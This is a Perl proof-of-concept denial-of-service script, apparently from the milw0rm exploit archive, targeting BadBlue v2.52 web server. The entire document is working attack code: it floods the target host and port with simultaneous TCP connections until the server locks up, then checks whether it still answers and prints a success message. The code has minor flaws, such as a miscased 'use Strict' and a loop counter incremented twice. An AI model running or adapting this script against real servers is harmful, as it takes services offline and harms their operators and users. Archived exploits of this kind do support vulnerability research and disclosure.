#!/usr/bin/perl 
############################################################## 
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code 
############################################################## 
# BadBlue Web Server can not handle many simultaneous connects 
# from the same host, and will lock up until the connects stop 
############################################################## 
# This Proof Of Concept Written By GulfTech Security Research 
############################################################## 

use Strict; 
use Socket; 
use IO::Socket; 

my $host = $ARGV[0]; 
my $port = $ARGV[1]; 
my $stop = $ARGV[2]; 
my $size = 1000; 
my $prot = getprotobyname('tcp'); 
my $slep = $ARGV[3]; 

printf("================================================ "); 
printf(" BadBlue v2.52 Web Server Denial Of Service POC "); 
printf("================================================ "); 
printf("
Making %d Connections To %s ", $stop , $host); 

for ($i=1; $i<$stop; $i++) 
{ 
socket($i, PF_INET, SOCK_STREAM, $prot ); 
my $dest = sockaddr_in ($port, inet_aton($host)); 
connect($i, $dest); 
} 

CheckServer($host, $i, $slep, $stop); 
KillThreads($stop); 
printf("
Exploit Attempt Unsuccesful"); 
exit; 

sub CheckServer($host, $i, $slep, $stop) { 
($host, $i, $slep, $stop) = @_; 
$blank = "1512" x 2; 
$request = "GET / HTTP/1.0".$blank; 
$remote = IO::Socket::INET->new( Proto => "tcp", 
PeerAddr => $host, 
PeerPort => $port, 
Timeout => '10000', 
Type => SOCK_STREAM, 
); 
print $remote $request; 
unless ( <$remote> ) 
{ 
printf("
Host %s Has Been Successfully DoS'ed ", $host); 
printf("
The Host Will Be Down For %d Seconds ", $slep); 
sleep($slep); 
KillThreads($stop); 
exit; 
} 
} 

sub KillThreads($stop) { 
$stop = @_; 
printf("
Killing All active Connections"); 
for ($l=1; $l<$stop; $l++) { 
shutdown($l,2)|| die("Couldn't Shut Down Socket"); 
$l++; 
} 
} 

# milw0rm.com [2004-08-26]